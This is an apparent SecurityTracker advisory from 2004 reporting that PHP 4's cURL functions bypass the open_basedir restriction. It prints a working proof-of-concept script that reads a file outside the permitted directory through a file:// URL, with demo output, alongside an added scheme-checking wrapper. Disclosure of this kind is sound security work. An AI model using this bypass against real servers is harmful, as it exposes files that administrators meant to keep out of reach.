PHP cURL Functions Let Scripts Bypass the 'open_basedir' Directory Restrictions
|
SecurityTracker Alert ID: 1011984 |
SecurityTracker URL: http://securitytracker.com/id/1011984
|
CVE Reference:
GENERIC-MAP-NOMATCH
|
Date: Oct 28 2004
|
Impact:
Disclosure of system information, Disclosure of user information
|
Exploit Included: Yes
|
Version(s): Only tested on PHP 4
|
Description:
A vulnerability was reported in the cURL functions of PHP. A script can use them to bypass the 'open_basedir' directory setting.
FraMe from kernelpanik.org reported that a local user can invoke the cURL (libcurl) functions to bypass the 'open_basedir' restrictions in the 'php.ini' file and access files in other directories.
A demonstration exploit is provided:
<?php
$ch = curl_init("file:///etc/parla");
$file=curl_exec($ch);
echo $file
?>
|
Impact:
A script can bypass the 'open_basedir' directory setting to access files on the target system.
|
Solution:
No solution was available at the time of this entry.
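An added example, not part of the advisory or of PHP itself: one way for application code that passes a URL to cURL to refuse the file:// scheme used in the demonstration above. It assumes a PHP build whose cURL extension defines CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS, which are newer than the PHP 4 releases tested here; fetch_web_url() is a hypothetical helper name.

```php
<?php
// Added example, not code from the advisory. fetch_web_url() is a hypothetical
// helper; the URL below is the one used in the advisory's demonstration.

function fetch_web_url($url)
{
    // 1. Check the scheme before libcurl sees the URL. strtolower() matters:
    //    URL schemes are case-insensitive, so "FILE://" must be refused too.
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if (!is_string($scheme)
        || !in_array(strtolower($scheme), array('http', 'https'), true)) {
        return array(false, 'scheme not allowed');
    }

    $ch = curl_init($url);
    if ($ch === false) {
        return array(false, 'curl_init failed');
    }

    // 2. Give libcurl the same allow-list, for the first request and for
    //    redirects, so a permitted URL cannot be bounced to file://.
    //    Assumption: the cURL extension defines these constants.
    if (defined('CURLOPT_PROTOCOLS')) {
        $web = CURLPROTO_HTTP | CURLPROTO_HTTPS;
        curl_setopt($ch, CURLOPT_PROTOCOLS, $web);
        curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, $web);
    }

    // Return the body instead of printing it, and bound the wait.
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);

    $body = curl_exec($ch);
    if ($body === false) {
        return array(false, curl_error($ch));
    }
    return array(true, $body);
}

// Refused at step 1; no request is made and no file is opened.
list($ok, $detail) = fetch_web_url('file:///etc/parla');
echo $ok ? "fetched\n" : "refused: $detail\n";
```

This wrapper covers code paths that route their URLs through it; a script that calls curl_init() directly is outside its reach.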
|
Vendor URL: www.php.net/
|
Cause:
Access control error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Message History:
None.
|
Source Message Contents
|
Subject: PHP4 cURL functions bypass open_basedir
|
====================================================
Subject: PHP4 cURL functions bypass open_basedir
Author: frame at kernelpanik.org
Product: PHP4 compiled with cURL (not tested in PHP5)
Vendor: PHP/Zend
Vendor URL: www.php.net
Type: Local
Risk: Low/Medium
=====================================================
PHP cURL functions bypass open_basedir
protection, so users can navigate through
the filesystem.
For example, setting "open_basedir" in php.ini to
"/var/www/html", anybody can retrieve "/etc/parla"
using cURL functions.
== Proof of concept (curl.php)
<?php
$ch = curl_init("file:///etc/parla");
$file=curl_exec($ch);
echo $file
?>
== Demo
$ cat /etc/parla
don't read please!
$ links -dump http://localhost/curltest/curl.php
don't read please!
== Release Timeline
No release timeline.
--
FraMe <frame@kernelpanik.org>
http://www.kernelpanik.org
|